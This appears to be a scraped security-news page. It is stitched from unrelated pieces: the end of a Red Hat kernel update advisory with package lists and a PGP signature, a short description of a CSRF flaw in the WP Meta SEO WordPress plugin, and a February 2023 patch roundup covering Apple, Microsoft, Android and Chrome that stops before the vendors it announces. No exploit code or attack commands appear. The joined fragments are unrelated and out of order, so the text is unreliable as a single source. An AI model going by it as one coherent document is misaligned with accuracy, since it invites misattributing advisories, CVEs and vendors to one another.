kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zrdzjgjWX9erEAQiWkQ//d8OoWO+BV0oKuhGiTvH7W/uP29aDTHe+  
iMd8yztBdHqZ4kpxI8Ro4nF64BYcnGhhY2fOQ54qPiqSyhooqz7QWrSzwdFvEPzX  
UeQCOtOj6Z3RBhfiyd1a8JLeK0hasCHJL6kR2Onipqpzvi7D2ihjFcy8censOxtp  
roi3FPBJzlC/PmmKgwFdDjFe2G9ZbiZ7plTIkjgzkFGpWah1An/OG0/rBmIDsUpf  
65bZZ6H7jyp8jUg8TCwfONxnJx7wlfev/ixZb/9ZPxkqqYq+mLhCLf3OLnSo0rNZ  
CUAQtbanYKT9x5fUU72diVG3h5pe1LD+8sG7se8pWNSHp3leaN5MB+Jdt5f0MTAn  
EJ4uI5ABEdoLeqbprNedtB8ngLhmNBrd8056T1oXEQDUDLjSJeYJpIbWZkpIG2WU  
1qjsEG5GssicaNx3NMf6Q528UwTpGbhKxHVfY35mqCbmGxWoMZC+5cjtPZQkHkEQ  
Qnp40RMP5bRGOlfbMeIb8vi7lrfvna1JsWm697zGJWD+CA9d02Td+kW58BITyfVc  
weJ8YOgvrgPq+61rNU/2yEoXoSdUlvJ0ajl+JYhod4RVpNZcEMK/lqu6QYejHNc2  
BlIN2OvZo3gVoslDDZq06NFd94p9spubcGXgWMN1zjNcqAV4wgjpnvzdjqj2cQTq  
JFTz9qAr0JE=  
=E5Jd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0944-01

The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the setIgnore function. This makes it possible for unauthenticated attackers to update plugin options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-1028: Diff [2869205:2870465] for wp-meta-seo/trunk – WordPress Plugin Repository

Plus: Microsoft fixes several zero-day bugs, Google patches Chrome and Android, Mozilla rids Firefox of a full-screen vulnerability, and more.

February has been a big month for security updates, with the likes of Apple, Microsoft, and Google releasing patches to fix serious vulnerabilities. Meanwhile, a number of enterprise bugs have been squashed by firms that include VMware, SAP, and Citrix. 

The flaws fixed during the month include several that were being used in real-life attacks, so it’s worth checking that your software is up to date.

Here’s everything you need to know about the security updates released this month. 

Apple iOS and iPadOS 16.3.1

Just weeks after the release of iOS 16.3, Apple issued iOS and iPadOS 16.3.1—an emergency patch to fix vulnerabilities that included a flaw in the browser engine WebKit that was already being used in attacks.

Tracked as CVE-2023-23529, the already exploited bug could lead to arbitrary code execution, Apple warned on its support page. “Apple is aware of a report that this issue may have been actively exploited,” the firm added. Another flaw patched in iOS 16.3.1 is in the Kernel at the heart of the iPhone operating system. The bug, which is tracked as CVE-2023-23514, could allow an attacker to execute arbitrary code with Kernel privileges.

Later in the month, Apple documented another vulnerability fixed in iOS 16.3.1, CVE-2023-23524. Reported by David Benjamin, a software engineer at Google, the flaw could enable a denial of service attack via a maliciously crafted certificate.

Apple also released macOS Ventura 13.2.1, tvOS 16.3.2, and watchOS 9.3.1 during the month.

Microsoft 

In mid-February, Microsoft warned that its Patch Tuesday has fixed 76 security vulnerabilities, three of which are already being used in attacks. Seven of the flaws are marked as critical, according to Microsoft’s update guide.

Tracked as CVE-2023-21823, one of the most serious of the already exploited bugs in the Windows graphics component could allow an attacker to gain System privileges.

Another already exploited flaw, CVE-2023-21715, is a feature bypass issue in Microsoft Publisher, while CVE-2023-23376 is a privilege escalation vulnerability in Windows common log file system driver.

That’s a lot of zero-day flaws fixed in one release, so take it as a prompt to update your Microsoft-based systems as soon as possible.

Google Android 

Android’s February security update is here, fixing multiple vulnerabilities in devices running the tech giant’s smartphone software. The most severe of these issues is a security vulnerability in the Framework component that could lead to local escalation of privilege with no additional privileges needed, Google noted in an advisory. 

Among the issues fixed in the Framework, eight are rated as having a high impact. Meanwhile, Google has squashed six bugs in the Kernel, as well as flaws in the System, MediaTek, and Unisoc components.

During the month, Google patched multiple privilege escalation flaws, as well as information disclosure and denial of service vulnerabilities. The company also released a patch for three Pixel-specific security issues. The Android February patch is already available for Google’s Pixel devices, while Samsung has moved quickly to issue the update to users of its Galaxy Note 20 series.

Google Chrome 

Google has released Chrome 110 for its browser, fixing 15 security vulnerabilities, three of which are rated as having a high impact. Tracked as CVE-2023-0696, the first of these is a type confusion bug in the V8 JavaScript engine, Google wrote in a security advisory. 

Meanwhile, CVE-2023-0697 is a flaw that allows inappropriate implementation in full-screen mode, and CVE-2023-0698 is an out-of-bounds read flaw in WebRTC. Four medium-severity vulnerabilities include a use after free in GPU, a heap buffer overflow flaw in WebUI, and a type confusion vulnerability in Data Transfer. Two further flaws are rated as having a low impact.

Tag

#sap